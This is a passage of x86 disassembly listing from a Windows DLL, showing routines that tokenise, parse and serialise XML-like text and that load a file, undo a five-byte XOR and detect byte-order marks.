lea eax, [ebp+Size]
push eax
push esi
call sub_10019BC6
mov edi, eax
mov eax, [ebp+var_18]
add esp, 0Ch
cmp eax, 9
mov ebx, edx
mov [ebp+var_3C], edi
jnz loc_1001976C
loc_10019A54: ; CODE XREF: sub_10019709+5B�j
mov eax, [ebp+var_14]
mov eax, [eax]
cmp byte ptr [eax+14h], 0
jnz short loc_10019A72
cmp dword ptr [eax+18h], 0
jz short loc_10019A72
mov eax, [esi+8]
mov dword ptr [esi+10h], 1
mov [esi+0Ch], eax
loc_10019A72: ; CODE XREF: sub_10019709+23C�j
; sub_10019709+354�j ...
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_1C]
call sub_1001A728
xor eax, eax
loc_10019A80: ; CODE XREF: sub_10019709+45B�j
mov ecx, [ebp+var_C]
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn 4
; ---------------------------------------------------------------------------
loc_10019A91: ; CODE XREF: sub_10019709+80�j
mov edi, [ebp+var_14]
push ebx
push esi
mov ecx, edi
call sub_1001967C
test al, al
jnz short loc_10019ADB
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+var_10]
push eax
push esi
call sub_10019BC6
add esp, 0Ch
cmp [ebp+var_18], 0
mov [ebp+var_3C], eax
mov ebx, edx
jnz short loc_10019AD4
lea eax, [ebp+var_18]
push eax
lea eax, [ebp+Size]
push eax
push esi
call sub_10019BC6
add esp, 0Ch
cmp [ebp+var_18], 4
jz short loc_10019ADF
loc_10019AD4: ; CODE XREF: sub_10019709+3B2�j
mov dword ptr [esi+10h], 5
loc_10019ADB: ; CODE XREF: sub_10019709+9F�j
; sub_10019709+B1�j ...
xor edi, edi
jmp short loc_10019B56
; ---------------------------------------------------------------------------
loc_10019ADF: ; CODE XREF: sub_10019709+3C9�j
mov eax, [esi]
push ebx ; int
add eax, [esi+8]
mov [esi+4], eax
mov eax, [edi]
push dword ptr [eax] ; Str
call sub_1001906B
pop ecx
test al, al
pop ecx
jz short loc_10019B0D
mov eax, [esi+8]
mov dword ptr [esi+10h], 1
mov [esi+0Ch], eax
mov eax, [ebp+var_10]
mov [esi+14h], ebx
mov [esi+18h], eax
loc_10019B0D: ; CODE XREF: sub_10019709+2E2�j
; sub_10019709+3EC�j
push dword ptr [edi]
call sub_100195F6
pop ecx
jmp short loc_10019B46
; ---------------------------------------------------------------------------
loc_10019B17: ; CODE XREF: sub_10019709+F0�j
mov dword ptr [esi+10h], 4
jmp short loc_10019B56
; ---------------------------------------------------------------------------
loc_10019B20: ; CODE XREF: sub_10019709+154�j
mov eax, [ebp+var_14]
mov eax, [eax]
mov eax, [eax]
cmp eax, edi
jnz short loc_10019B34
mov dword ptr [esi+10h], 7
jmp short loc_10019B56
; ---------------------------------------------------------------------------
loc_10019B34: ; CODE XREF: sub_10019709+420�j
push dword ptr [esi+14h] ; int
push eax ; Str
call sub_1001906B
pop ecx
test al, al
pop ecx
jnz short loc_10019B46
mov [esi+18h], edi
loc_10019B46: ; CODE XREF: sub_10019709+172�j
; sub_10019709+40C�j ...
push 1
pop edi
jmp short loc_10019B56
; ---------------------------------------------------------------------------
loc_10019B4B: ; CODE XREF: sub_10019709+1F4�j
mov [esi+10h], edx
jmp loc_10019A72
; ---------------------------------------------------------------------------
loc_10019B53: ; CODE XREF: sub_10019709+26C�j
; sub_10019709+2FF�j
; DATA XREF: ...
mov [esi+10h], edx ; jumptable 10019975 cases 1-3,6,8
; jumptable 10019A08 cases 1-3,5,6,8
loc_10019B56: ; CODE XREF: sub_10019709+3D4�j
; sub_10019709+415�j ...
or [ebp+var_4], 0FFFFFFFFh
lea ecx, [ebp+var_1C]
call sub_1001A728
mov eax, edi
jmp loc_10019A80
; ---------------------------------------------------------------------------
loc_10019B69: ; CODE XREF: sub_10019709+2FF�j
; DATA XREF: .text:off_10019BA2�o
mov eax, [ebp+var_14] ; jumptable 10019A08 case 7
push dword ptr [eax]
call sub_100195F6
mov eax, [esi+8]
pop ecx
add eax, [esi]
mov [esi+4], eax
jmp short loc_10019B46
sub_10019709 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
off_10019B7E dd offset loc_1001997C ; DATA XREF: sub_10019709+26C�r
dd offset loc_10019B53 ; jump table for switch statement
dd offset loc_10019B53
dd offset loc_10019B53
dd offset loc_100199A3
dd offset loc_100199FA
dd offset loc_10019B53
dd offset loc_100199A3
dd offset loc_10019B53
off_10019BA2 dd offset loc_10019A0F ; DATA XREF: sub_10019709+2FF�r
dd offset loc_10019B53 ; jump table for switch statement
dd offset loc_10019B53
dd offset loc_10019B53
dd offset loc_10019A21
dd offset loc_10019B53
dd offset loc_10019B53
dd offset loc_10019B69
dd offset loc_10019B53
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10019BC6 proc near ; CODE XREF: sub_10019709+44�p
; sub_10019709+E0�p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 0Ch
push ebx
push esi
mov esi, [ebp+arg_0]
push edi
loc_10019BD2: ; CODE XREF: sub_10019BC6+1E�j
; sub_10019BC6+22�j ...
mov eax, [esi+8]
push esi
mov [ebp+var_4], eax
call sub_10019D87
cmp al, 0Ah
pop ecx
mov byte ptr [ebp+arg_0+3], al
jz short loc_10019BD2
cmp al, 20h
jz short loc_10019BD2
cmp al, 9
jz short loc_10019BD2
cmp al, 0Dh
jz short loc_10019BD2
test al, al
jz loc_10019D6A
mov eax, [esi]
push dword_10023EF4
add eax, [ebp+var_4]
mov ebx, ds:_mbsnbcmp
mov edi, offset off_10023EF0
push eax
mov [ebp+var_8], eax
push off_10023EF0
loc_10019C1A: ; CODE XREF: sub_10019BC6+6E�j
call ebx ; _mbsnbcmp
add esp, 0Ch
test eax, eax
jz short loc_10019C36
mov eax, [edi+0Ch]
add edi, 0Ch
test eax, eax
jz short loc_10019C4D
push dword ptr [edi+4]
push [ebp+var_8]
push eax
jmp short loc_10019C1A
; ---------------------------------------------------------------------------
loc_10019C36: ; CODE XREF: sub_10019BC6+5B�j
mov eax, [edi+4]
dec eax
add [esi+8], eax
mov eax, [ebp+arg_8]
mov dword ptr [eax], 8
mov eax, edi
jmp loc_10019D7F
; ---------------------------------------------------------------------------
loc_10019C4D: ; CODE XREF: sub_10019BC6+65�j
mov bl, byte ptr [ebp+arg_0+3]
mov edi, [ebp+arg_8]
movsx eax, bl
sub eax, 22h
jz loc_10019CFA
push 5
pop ecx
sub eax, ecx
jz loc_10019CFA
sub eax, 8
jz short loc_10019CDD
sub eax, 0Dh
jz short loc_10019C95
dec eax
jz short loc_10019C8B
dec eax
jnz loc_10019D1A
mov eax, edi
mov dword ptr [eax], 4
jmp loc_10019D5D
; ---------------------------------------------------------------------------
loc_10019C8B: ; CODE XREF: sub_10019BC6+AF�j
mov eax, [ebp+arg_8]
mov [eax], ecx
jmp loc_10019D5D
; ---------------------------------------------------------------------------
loc_10019C95: ; CODE XREF: sub_10019BC6+AC�j
mov eax, [esi+8]
mov ecx, [esi]
mov al, [eax+ecx]
cmp al, 2Fh
jnz short loc_10019CB6
push esi
call sub_10019D87
mov eax, [ebp+arg_8]
pop ecx
mov dword ptr [eax], 3
jmp loc_10019D5D
; ---------------------------------------------------------------------------
loc_10019CB6: ; CODE XREF: sub_10019BC6+D9�j
cmp al, 3Fh
jnz short loc_10019CCF
push esi
call sub_10019D87
mov eax, [ebp+arg_8]
pop ecx
mov dword ptr [eax], 6
jmp loc_10019D5D
; ---------------------------------------------------------------------------
loc_10019CCF: ; CODE XREF: sub_10019BC6+F2�j
mov eax, [ebp+arg_8]
mov dword ptr [eax], 2
jmp loc_10019D5D
; ---------------------------------------------------------------------------
loc_10019CDD: ; CODE XREF: sub_10019BC6+A7�j
mov eax, [esi+8]
mov ecx, [esi]
cmp byte ptr [eax+ecx], 3Eh
jnz short loc_10019D1A
push esi
call sub_10019D87
mov eax, [ebp+arg_8]
pop ecx
mov dword ptr [eax], 7
jmp short loc_10019D5D
; ---------------------------------------------------------------------------
loc_10019CFA: ; CODE XREF: sub_10019BC6+93�j
; sub_10019BC6+9E�j
mov dword ptr [edi], 1
loc_10019D00: ; CODE XREF: sub_10019BC6+14B�j
push esi
call sub_10019D87
test al, al
pop ecx
jz short loc_10019D13
cmp al, bl
jz short loc_10019D5D
cmp al, 3Ch
jnz short loc_10019D00
loc_10019D13: ; CODE XREF: sub_10019BC6+143�j
mov eax, [ebp+var_4]
inc eax
mov [esi+8], eax
loc_10019D1A: ; CODE XREF: sub_10019BC6+B2�j
; sub_10019BC6+120�j
and dword ptr [edi], 0
loc_10019D1D: ; CODE XREF: sub_10019BC6+181�j
push esi
call sub_10019D87
test al, al
pop ecx
jz short loc_10019D5D
cmp al, 0Ah
jz short loc_10019D5A
cmp al, 20h
jz short loc_10019D5A
cmp al, 9
jz short loc_10019D5A
cmp al, 0Dh
jz short loc_10019D5A
cmp al, 2Fh
jnz short loc_10019D49
mov eax, [esi+8]
mov ecx, [esi]
cmp byte ptr [eax+ecx], 3Eh
loc_10019D45: ; CODE XREF: sub_10019BC6+18D�j
jz short loc_10019D55
jmp short loc_10019D1D
; ---------------------------------------------------------------------------
loc_10019D49: ; CODE XREF: sub_10019BC6+174�j
cmp al, 3Ch
jz short loc_10019D55
cmp al, 3Eh
jz short loc_10019D55
cmp al, 3Dh
jmp short loc_10019D45
; ---------------------------------------------------------------------------
loc_10019D55: ; CODE XREF: sub_10019BC6:loc_10019D45�j
; sub_10019BC6+185�j ...
dec dword ptr [esi+8]
jmp short loc_10019D5D
; ---------------------------------------------------------------------------
loc_10019D5A: ; CODE XREF: sub_10019BC6+164�j
; sub_10019BC6+168�j ...
inc [ebp+var_4]
loc_10019D5D: ; CODE XREF: sub_10019BC6+C0�j
; sub_10019BC6+CA�j ...
mov eax, [esi+8]
mov ecx, [ebp+arg_4]
sub eax, [ebp+var_4]
mov [ecx], eax
jmp short loc_10019D7D
; ---------------------------------------------------------------------------
loc_10019D6A: ; CODE XREF: sub_10019BC6+2E�j
mov eax, [ebp+arg_4]
and dword ptr [eax], 0
mov eax, [ebp+arg_8]
and [ebp+var_8], 0
mov dword ptr [eax], 9
loc_10019D7D: ; CODE XREF: sub_10019BC6+1A2�j
xor eax, eax
loc_10019D7F: ; CODE XREF: sub_10019BC6+82�j
mov edx, [ebp+var_8]
pop edi
pop esi
pop ebx
leave
retn
sub_10019BC6 endp
; =============== S U B R O U T I N E =======================================
sub_10019D87 proc near ; CODE XREF: sub_10019BC6+13�p
; sub_10019BC6+DC�p ...
arg_0 = dword ptr 4
mov ecx, [esp+arg_0]
push esi
push edi
mov edi, off_10023F80
mov edx, [ecx+8]
mov eax, [ecx]
mov al, [edx+eax]
movzx esi, al
movsx esi, byte ptr [esi+edi]
add esi, edx
pop edi
mov [ecx+8], esi
pop esi
retn
sub_10019D87 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_10019DAA(int, int, char *Str, int)
sub_10019DAA proc near ; CODE XREF: sub_1001A057+195�p
Size = dword ptr -44h
var_40 = dword ptr -40h
var_3C = dword ptr -3Ch
var_38 = dword ptr -38h
var_34 = dword ptr -34h
var_30 = dword ptr -30h
var_2C = dword ptr -2Ch
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = byte ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
Str = dword ptr 10h
arg_C = dword ptr 14h
mov eax, offset loc_1001D2BB
call _EH_prolog ; _EH_prolog
sub esp, 38h
push ebx
push esi
mov esi, [ebp+arg_4]
xor ebx, ebx
cmp esi, ebx
push edi
mov [ebp+var_18], ebx
jnz short loc_10019DEB
mov eax, [ebp+arg_C]
cmp eax, ebx
jz short loc_10019DD9
mov dword ptr [eax], 0Bh
mov [eax+4], ebx
mov [eax+8], ebx
loc_10019DD9: ; CODE XREF: sub_10019DAA+21�j
mov ecx, [ebp+arg_0]
push offset dword_10073FF0
call sub_1001A8C7
jmp loc_10019FE3
; ---------------------------------------------------------------------------
loc_10019DEB: ; CODE XREF: sub_10019DAA+1A�j
push ebx ; char
push ebx ; Memory
push ebx ; int
lea ecx, [ebp+arg_4]
call sub_100190FC
push 1
lea eax, [ebp+Size]
pop edi
lea ecx, [ebp+arg_4]
push eax ; Size
mov [ebp+var_4], edi
mov [ebp+Size], esi
mov [ebp+var_40], esi
mov [ebp+var_3C], ebx
mov [ebp+var_38], ebx
mov [ebp+var_34], ebx
mov [ebp+var_30], ebx
mov [ebp+var_2C], ebx
mov [ebp+var_28], ebx
mov [ebp+var_24], ebx
mov [ebp+var_20], edi
call sub_10019709
mov esi, [ebp+var_34]
lea ecx, [ebp+arg_4]
mov [ebp+var_14], esi
call sub_1001AA40
cmp eax, edi
jnz short loc_10019E6A
lea ecx, [ebp+arg_4]
call sub_1001AA4B
cmp eax, edi
jnz short loc_10019E6A
lea eax, [ebp+var_10]
push ebx
push eax
lea ecx, [ebp+arg_4]
call sub_1001AAAC
push eax
lea ecx, [ebp+arg_4]
mov byte ptr [ebp+var_4], 2
call sub_1001A8A2
lea ecx, [ebp+var_10]
mov byte ptr [ebp+var_4], 1
call sub_1001A728
loc_10019E6A: ; CODE XREF: sub_10019DAA+8C�j
; sub_10019DAA+98�j
cmp esi, ebx
jz short loc_10019E84
cmp esi, edi
jz short loc_10019E84
push offset dword_10073FF0
lea ecx, [ebp+arg_4]
call sub_1001A8A2
jmp loc_10019FA3
; ---------------------------------------------------------------------------
loc_10019E84: ; CODE XREF: sub_10019DAA+C2�j
; sub_10019DAA+C6�j
lea ecx, [ebp+arg_4]
call sub_1001AA36
cmp [ebp+Str], ebx
mov [ebp+var_10], eax
jz loc_10019FA3
push [ebp+Str] ; Str
call strlen ; strlen
test eax, eax
pop ecx
jz loc_10019FA3
cmp [ebp+var_10], ebx
mov esi, ds:_mbsicmp
jz short loc_10019ECC
lea ecx, [ebp+arg_4]
call sub_1001AA36
push [ebp+Str]
push eax
call esi ; _mbsicmp
pop ecx
test eax, eax
pop ecx
jz loc_10019FA0
loc_10019ECC: ; CODE XREF: sub_10019DAA+108�j
mov [ebp+var_10], ebx
lea ecx, [ebp+arg_4]
mov byte ptr [ebp+var_4], 3
xor edi, edi
call sub_1001AA40
test eax, eax
jle short loc_10019F44
loc_10019EE1: ; CODE XREF: sub_10019DAA+198�j
lea eax, [ebp+var_1C]
push edi
push eax
lea ecx, [ebp+arg_4]
call sub_1001AAAC
push eax
lea ecx, [ebp+var_10]
mov byte ptr [ebp+var_4], 4
call sub_1001A8A2
lea ecx, [ebp+var_1C]
mov byte ptr [ebp+var_4], 3
call sub_1001A728
lea ecx, [ebp+var_10]
call sub_1001AA36
push [ebp+Str]
push eax
call esi ; _mbsicmp
pop ecx
test eax, eax
pop ecx
jz short loc_10019F44
lea ecx, [ebp+var_10]
call sub_1001AADF
test al, al
jz short loc_10019F37
lea eax, [ebp+var_10]
lea ecx, [ebp+arg_4]
push eax
call sub_1001A8A2
xor edi, edi
jmp short loc_10019F38
; ---------------------------------------------------------------------------
loc_10019F37: ; CODE XREF: sub_10019DAA+17B�j
inc edi
loc_10019F38: ; CODE XREF: sub_10019DAA+18B�j
lea ecx, [ebp+arg_4]
call sub_1001AA40
cmp edi, eax
jl short loc_10019EE1
loc_10019F44: ; CODE XREF: sub_10019DAA+135�j
; sub_10019DAA+16F�j
lea ecx, [ebp+arg_4]
call sub_1001AA40
cmp edi, eax
jl short loc_10019F85
mov eax, [ebp+arg_C]
cmp eax, ebx
jz short loc_10019F63
mov dword ptr [eax], 0Dh
mov [eax+4], ebx
mov [eax+8], ebx
loc_10019F63: ; CODE XREF: sub_10019DAA+1AB�j
mov ecx, [ebp+arg_0]
push offset dword_10073FF0
call sub_1001A8C7
lea ecx, [ebp+var_10]
mov [ebp+var_18], 1
mov byte ptr [ebp+var_4], 1
call sub_1001A728
jmp short loc_10019FD8
; ---------------------------------------------------------------------------
loc_10019F85: ; CODE XREF: sub_10019DAA+1A4�j
lea eax, [ebp+var_10]
lea ecx, [ebp+arg_4]
push eax
call sub_1001A8A2
lea ecx, [ebp+var_10]
mov byte ptr [ebp+var_4], 1
call sub_1001A728
push 1
pop edi
loc_10019FA0: ; CODE XREF: sub_10019DAA+11C�j
mov esi, [ebp+var_14]
loc_10019FA3: ; CODE XREF: sub_10019DAA+D5�j
; sub_10019DAA+E8�j ...
mov eax, [ebp+arg_C]
cmp eax, ebx
jz short loc_10019FC9
cmp esi, ebx
mov [eax], esi
jz short loc_10019FC9
cmp esi, edi
jnz short loc_10019FBA
mov ecx, [ebp+var_38]
mov [ebp+var_3C], ecx
loc_10019FBA: ; CODE XREF: sub_10019DAA+208�j
push eax
push [ebp+var_3C]
push [ebp+Size]
call sub_10019FF5
add esp, 0Ch
loc_10019FC9: ; CODE XREF: sub_10019DAA+1FE�j
; sub_10019DAA+204�j
mov ecx, [ebp+arg_0]
lea eax, [ebp+arg_4]
push eax
call sub_1001A8C7
mov [ebp+var_18], edi
loc_10019FD8: ; CODE XREF: sub_10019DAA+1D9�j
lea ecx, [ebp+arg_4]
mov byte ptr [ebp+var_4], bl
call sub_1001A728
loc_10019FE3: ; CODE XREF: sub_10019DAA+3C�j
mov ecx, [ebp+var_C]
mov eax, [ebp+arg_0]
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_10019DAA endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_10019FF5 proc near ; CODE XREF: sub_10019DAA+217�p
var_28 = dword ptr -28h
var_24 = dword ptr -24h
var_20 = dword ptr -20h
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 28h
mov eax, [ebp+arg_0]
push ebx
mov ebx, [ebp+arg_4]
push esi
mov esi, [ebp+arg_8]
push edi
mov [ebp+var_28], eax
mov [ebp+var_24], eax
push 1
xor eax, eax
pop edi
cmp ebx, eax
mov [ebp+var_20], eax
mov [ebp+var_1C], eax
mov [ebp+var_18], eax
mov [ebp+var_14], eax
mov [ebp+var_10], eax
mov [ebp+var_C], eax
mov [ebp+var_8], eax
mov [ebp+var_4], edi
mov [esi+4], edi
mov [esi+8], edi
jle short loc_1001A052
loc_1001A034: ; CODE XREF: sub_10019FF5+5B�j
lea eax, [ebp+var_28]
push eax
call sub_10019D87
cmp al, 0Ah
pop ecx
jz short loc_1001A047
inc dword ptr [esi+8]
jmp short loc_1001A04D
; ---------------------------------------------------------------------------
loc_1001A047: ; CODE XREF: sub_10019FF5+4B�j
inc dword ptr [esi+4]
mov [esi+8], edi
loc_1001A04D: ; CODE XREF: sub_10019FF5+50�j
cmp [ebp+var_20], ebx
jl short loc_1001A034
loc_1001A052: ; CODE XREF: sub_10019FF5+3D�j
pop edi
pop esi
pop ebx
leave
retn
sub_10019FF5 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
; int __cdecl sub_1001A057(int, char *Filename, char *Str, int)
sub_1001A057 proc near ; CODE XREF: sub_1000878F+AF�p
; sub_1000A318+187�p
var_2C = dword ptr -2Ch
var_1C = dword ptr -1Ch
var_18 = dword ptr -18h
File = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_4 = dword ptr -4
arg_0 = dword ptr 8
Filename = dword ptr 0Ch
Str = dword ptr 10h
arg_C = dword ptr 14h
mov eax, offset loc_1001D2E7
call _EH_prolog ; _EH_prolog
sub esp, 10h
push ebx
push esi
mov esi, [ebp+arg_C]
xor ebx, ebx
cmp esi, ebx
push edi
mov [ebp+var_1C], ebx
jz short loc_1001A079
mov [esi+4], ebx
mov [esi+8], ebx
loc_1001A079: ; CODE XREF: sub_1001A057+1A�j
push offset Mode ; "rb"
push [ebp+Filename] ; Filename
call ds:fopen ; fopen
mov edi, eax
pop ecx
cmp edi, ebx
pop ecx
mov [ebp+File], edi
jnz short loc_1001A0AE
cmp esi, ebx
jz short loc_1001A09C
mov dword ptr [esi], 0Ch
loc_1001A09C: ; CODE XREF: sub_1001A057+3D�j
mov ecx, [ebp+arg_0]
push offset dword_10073FF0
call sub_1001A8C7
jmp loc_1001A21B
; ---------------------------------------------------------------------------
loc_1001A0AE: ; CODE XREF: sub_1001A057+39�j
mov esi, ds:fseek
push 2 ; Origin
push ebx ; Offset
push edi ; File
call esi ; fseek
push edi ; File
call ds:ftell ; ftell
mov edi, eax
add esp, 10h
cmp edi, ebx
mov [ebp+Filename], ebx
jnz short loc_1001A0EF
mov eax, [ebp+arg_C]
cmp eax, ebx
jz short loc_1001A0DA
mov dword ptr [eax], 2
loc_1001A0DA: ; CODE XREF: sub_1001A057+7B�j
push [ebp+File] ; File
call ds:fclose ; fclose
mov [esp+2Ch+var_2C], offset dword_10073FF0
jmp loc_1001A1D2
; ---------------------------------------------------------------------------
loc_1001A0EF: ; CODE XREF: sub_1001A057+74�j
push ebx ; Origin
push ebx ; Offset
push [ebp+File] ; File
call esi ; fseek
lea eax, [edi+4]
push eax ; Size
call ds:malloc ; malloc
push [ebp+File] ; File
mov esi, eax
push 1 ; Count
push edi ; ElementSize
push esi ; DstBuf
call ds:fread ; fread
add esp, 20h
push 5
pop eax
cmp edi, eax
mov [ebp+var_10], eax
jle short loc_1001A136
loc_1001A11C: ; CODE XREF: sub_1001A057+DD�j
mov ecx, [ebp+var_10]
xor eax, eax
add ecx, esi
loc_1001A123: ; CODE XREF: sub_1001A057+D5�j
mov dl, [eax+esi]
xor [ecx], dl
inc eax
cmp eax, 5
jl short loc_1001A123
inc [ebp+var_10]
cmp [ebp+var_10], edi
jl short loc_1001A11C
loc_1001A136: ; CODE XREF: sub_1001A057+C3�j
push [ebp+File] ; File
call ds:fclose ; fclose
lea eax, [esi+edi]
pop ecx
mov [eax], bl
mov [eax+1], bl
mov [eax+2], bl
mov [eax+3], bl
cmp byte_10023EEC, bl
jz short loc_1001A1BC
push edi ; iSize
push esi ; lpv
call sub_10018943
pop ecx
test al, al
pop ecx
jz short loc_1001A1A4
mov al, [esi]
cmp al, 0EFh
jnz short loc_1001A176
cmp byte ptr [esi+1], 0FFh
jnz short loc_1001A176
mov [ebp+Filename], 2
loc_1001A176: ; CODE XREF: sub_1001A057+110�j
; sub_1001A057+116�j
cmp al, 0FFh
jnz short loc_1001A187
cmp byte ptr [esi+1], 0FEh
jnz short loc_1001A187
mov [ebp+Filename], 2
loc_1001A187: ; CODE XREF: sub_1001A057+121�j
; sub_1001A057+127�j
mov eax, [ebp+Filename]
add eax, esi
push eax ; lpWideCharStr
call sub_10018954
push esi ; Memory
mov edi, eax
call ds:free ; free
pop ecx
mov esi, edi
pop ecx
mov [ebp+Filename], ebx
jmp short loc_1001A1BC
; ---------------------------------------------------------------------------
loc_1001A1A4: ; CODE XREF: sub_1001A057+10A�j
cmp byte ptr [esi], 0EFh
jnz short loc_1001A1BC
cmp byte ptr [esi+1], 0BBh
jnz short loc_1001A1BC
cmp byte ptr [esi+2], 0BFh
jnz short loc_1001A1BC
mov [ebp+Filename], 3
loc_1001A1BC: ; CODE XREF: sub_1001A057+FD�j
; sub_1001A057+14B�j ...
cmp esi, ebx
jnz short loc_1001A1DC
mov eax, [ebp+arg_C]
cmp eax, ebx
jz short loc_1001A1CD
mov dword ptr [eax], 0Fh
loc_1001A1CD: ; CODE XREF: sub_1001A057+16E�j
push offset dword_10073FF0
loc_1001A1D2: ; CODE XREF: sub_1001A057+93�j
mov ecx, [ebp+arg_0]
call sub_1001A8C7
jmp short loc_1001A21B
; ---------------------------------------------------------------------------
loc_1001A1DC: ; CODE XREF: sub_1001A057+167�j
push [ebp+arg_C] ; int
mov eax, [ebp+Filename]
add eax, esi
push [ebp+Str] ; Str
push eax ; int
lea eax, [ebp+var_18]
push eax ; int
call sub_10019DAA
push 1
pop edi
push esi ; Memory
mov [ebp+var_4], edi
call ds:free ; free
mov ecx, [ebp+arg_0]
add esp, 14h
lea eax, [ebp+var_18]
push eax
call sub_1001A8C7
lea ecx, [ebp+var_18]
mov [ebp+var_1C], edi
mov byte ptr [ebp+var_4], bl
call sub_1001A728
loc_1001A21B: ; CODE XREF: sub_1001A057+52�j
; sub_1001A057+183�j
mov ecx, [ebp+var_C]
mov eax, [ebp+arg_0]
pop edi
pop esi
pop ebx
mov large fs:0, ecx
leave
retn
sub_1001A057 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_1001A22D proc near ; CODE XREF: sub_1001A22D+389�p
; sub_1001A6C0+35�p ...
var_14 = dword ptr -14h
var_10 = dword ptr -10h
var_C = dword ptr -0Ch
var_8 = dword ptr -8
var_4 = dword ptr -4
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
push ebp
mov ebp, esp
sub esp, 14h
push ebx
push esi
push edi
mov edi, [ebp+arg_0]
or [ebp+var_14], 0FFFFFFFFh
xor esi, esi
mov eax, [edi+0Ch]
add eax, [edi+8]
add eax, [edi+4]
mov [ebp+var_10], eax
mov eax, [edi]
cmp eax, esi
jz short loc_1001A25D
push eax ; Str
call strlen ; strlen
pop ecx
mov [ebp+var_C], eax
jmp short loc_1001A260
; ---------------------------------------------------------------------------
loc_1001A25D: ; CODE XREF: sub_1001A22D+22�j
mov [ebp+var_C], esi
loc_1001A260: ; CODE XREF: sub_1001A22D+2E�j
mov eax, [ebp+var_C]
mov ebx, [ebp+arg_4]
test eax, eax
jz loc_1001A3B1
mov esi, [ebp+arg_8]
inc esi
neg esi
sbb esi, esi
and esi, [ebp+arg_8]
test ebx, ebx
jz short loc_1001A2C1
test esi, esi
jz short loc_1001A29B
lea ecx, [esi]
mov eax, 9090909h
mov edx, ecx
mov edi, ebx
shr ecx, 2
rep stosd
mov ecx, edx
and ecx, 3
rep stosb
mov edi, [ebp+arg_0]
loc_1001A29B: ; CODE XREF: sub_1001A22D+52�j
mov byte ptr [esi+ebx], 3Ch
inc esi
cmp byte ptr [edi+14h], 0
jz short loc_1001A2AB
mov byte ptr [esi+ebx], 3Fh
inc esi
loc_1001A2AB: ; CODE XREF: sub_1001A22D+77�j
push dword ptr [edi] ; Source
lea eax, [esi+ebx]
push eax ; Dest
call strcpy ; strcpy
add esi, [ebp+var_C]
pop ecx
pop ecx
mov byte ptr [esi+ebx], 20h
jmp short loc_1001A2CB
; ---------------------------------------------------------------------------
loc_1001A2C1: ; CODE XREF: sub_1001A22D+4E�j
cmp byte ptr [edi+14h], 0
lea esi, [esi+eax+2]
jz short loc_1001A2CC
loc_1001A2CB: ; CODE XREF: sub_1001A22D+92�j
inc esi
loc_1001A2CC: ; CODE XREF: sub_1001A22D+9C�j
mov eax, [edi+28h]
and [ebp+var_4], 0
cmp dword ptr [edi+10h], 0
mov [ebp+var_8], eax
jle loc_1001A37A
loc_1001A2E0: ; CODE XREF: sub_1001A22D+147�j
mov eax, [ebp+var_8]
mov eax, [eax]
test eax, eax
jz short loc_1001A2F5
push eax ; Str
call strlen ; strlen
pop ecx
mov [ebp+arg_4], eax
jmp short loc_1001A2F9
; ---------------------------------------------------------------------------
loc_1001A2F5: ; CODE XREF: sub_1001A22D+BA�j
and [ebp+arg_4], 0
loc_1001A2F9: ; CODE XREF: sub_1001A22D+C6�j
cmp [ebp+arg_4], 0
jz short loc_1001A367
test ebx, ebx
jz short loc_1001A313
mov eax, [ebp+var_8]
push dword ptr [eax] ; Source
lea eax, [esi+ebx]
push eax ; Dest
call strcpy ; strcpy
pop ecx
pop ecx
loc_1001A313: ; CODE XREF: sub_1001A22D+D4�j
mov eax, [ebp+var_8]
add esi, [ebp+arg_4]
mov eax, [eax+4]
test eax, eax
jz short loc_1001A35E
push eax
call sub_10018DD2
test ebx, ebx
pop ecx
mov [ebp+arg_4], eax
jz short loc_1001A357
mov byte ptr [esi+ebx], 3Dh
mov byte ptr [esi+ebx+1], 22h
test eax, eax
jz short loc_1001A34D
mov eax, [ebp+var_8]
push dword ptr [eax+4] ; int
lea eax, [esi+ebx+2]
push eax ; Dest
call sub_10018D54
pop ecx
pop ecx
loc_1001A34D: ; CODE XREF: sub_1001A22D+10C�j
mov eax, [ebp+arg_4]
add eax, esi
mov byte ptr [eax+ebx+2], 22h
loc_1001A357: ; CODE XREF: sub_1001A22D+FF�j
mov eax, [ebp+arg_4]
lea esi, [esi+eax+3]
loc_1001A35E: ; CODE XREF: sub_1001A22D+F1�j
test ebx, ebx
jz short loc_1001A366
mov byte ptr [esi+ebx], 20h
loc_1001A366: ; CODE XREF: sub_1001A22D+133�j
inc esi
loc_1001A367: ; CODE XREF: sub_1001A22D+D0�j
add [ebp+var_8], 8
inc [ebp+var_4]
mov eax, [ebp+var_4]
cmp eax, [edi+10h]
jl loc_1001A2E0
loc_1001A37A: ; CODE XREF: sub_1001A22D+AD�j
cmp byte ptr [edi+14h], 0
jz short loc_1001A39F
test ebx, ebx
jz short loc_1001A38D
mov byte ptr [esi+ebx-1], 3Fh
mov byte ptr [esi+ebx], 3Eh
loc_1001A38D: ; CODE XREF: sub_1001A22D+155�j
inc esi
loc_1001A38E: ; CODE XREF: sub_1001A22D+17A�j
; sub_1001A22D+181�j
cmp [ebp+arg_8], 0FFFFFFFFh
jz short loc_1001A3C9
test ebx, ebx
jz short loc_1001A39C
